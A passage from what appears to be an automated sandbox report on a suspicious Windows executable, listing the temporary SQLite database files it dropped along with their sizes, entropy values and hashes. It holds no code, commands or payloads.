                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\ujdmmvWtT7

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):40960
                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\umVaz2yxFC

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):40960
                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\v9jeDPchKl

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):126976
                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\vErEM0fioP

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):106496
                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\vGBeay85vR

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):159744
                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\vgRtlGlDtF

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):40960
                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\vzX9XHYRuC

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):159744
                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\x2p2AcGkyk

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):114688
                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\x3EOyTCoGJ

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):126976
                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\xNgEzzMbi6

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):106496
                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\xd7HwbUMLw

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\xnuofgQQTG

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\xpbO93Du2b

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):106496
                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\xvIxsvj2Gm

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):126976
                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\yRwIJEHebY

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):49152
                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\yf3CSWFOU6

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):106496
                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\ynk0hLWHdW

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):106496
                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\yrtHnyFEDi

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):114688
                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\z7Ysg3aqll

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):114688
                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\zB5SYhfzXQ

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):106496
                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\zGUcBlvEOd

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):114688
                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\zlEtoTe8MU

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):20480
                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                        Encrypted:false
